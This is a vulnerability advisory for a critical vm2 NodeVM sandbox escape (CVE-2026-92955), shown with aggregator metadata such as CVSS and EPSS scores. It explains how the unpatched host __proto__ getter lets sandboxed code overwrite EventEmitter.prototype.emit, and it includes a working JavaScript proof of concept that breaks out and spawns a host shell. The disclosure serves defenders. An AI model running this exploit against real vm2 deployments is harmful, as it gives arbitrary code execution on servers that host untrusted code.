CVE-2026-92955
## Summary It being possible to obtain the host `__proto__` getter/setter, has been used in many reports: - https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq - https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg - https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p - https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6 Yet it was never patched... --- This can, still, be used to escape the sandbox, one example (I'm sure there's other ways as well), is via `console._stdout`/`console._stderr` (`NodeVM` with `console: 'inherit'`, which is the default) ## Details The prototype chain for `console._stdout`/`console._stderr` is: ``` _stdout / _stderr -> WriteStream (TTY only) -> Socket -> Duplex -> Readable -> Stream -> EventEmitter ``` `process` is an `EventEmitter`, and nothing stops us from writing things to `EventEmmiter.prototype` By overwriting `EventEmmiter.prototype.emit` with a function, and making `process` emit an event (e.g. `exit`, `unhandledRejection` etc.), we can execute code with `this` being `process`. This also bypasses `--disallow-code-generation-from-strings`, which blocks the "usual" escape of obtaining the host function constructor. ## PoC ```js const { NodeVM } = require("vm2"); code = ` const gP = Buffer.call.call(__lookupGetter__,67,'__proto__'); // vm __proto__ getter console.log(__lookupGetter__.call(0,'__proto__').call(console._stderr)); // [Object: null prototype] {} // host __proto__ getter console.log(gP.call(console._stderr)); // Socket { [...] } let p = console._stdout; while (p.pipe) { console.log(p.constructor.name); p = gP.call(p); }; p.emit = function(){ console.log(this+[]); this.getBuiltinModule("child_process").execSync("sh",{stdio:"inherit"}) } `; const vm = new NodeVM(); vm.run(code); ```
Properties
- severity
- critical
- summary
- vm2: Sandbox Escape (NodeVM)
- epss_score
- 0.00712
- cvss_score
- 10
- retrieved_at
- 2026-10-05T22:59:58+00:00
- ghsa_published
- 2026-10-05T22:47:09Z
- source_url
- https://github.com/advisories/GHSA-88hf-g992-jg85
- ghsa_updated
- 2026-10-05T22:47:10Z
- ghsa_id
- GHSA-88hf-g992-jg85
- last_source
- FIRST EPSS
- cve_id
- CVE-2026-92955
- cvss_vector
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- signal_observed_at
- 2026-10-05T22:52:21+00:00
- is_ghsa_only
- false
- epss_percentile
- 0.51998
Related Entities (5)
ENRICHED_BY (1)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
REPORTED_BY (1)
Explore deeper with Ninja Signal's threat intelligence graph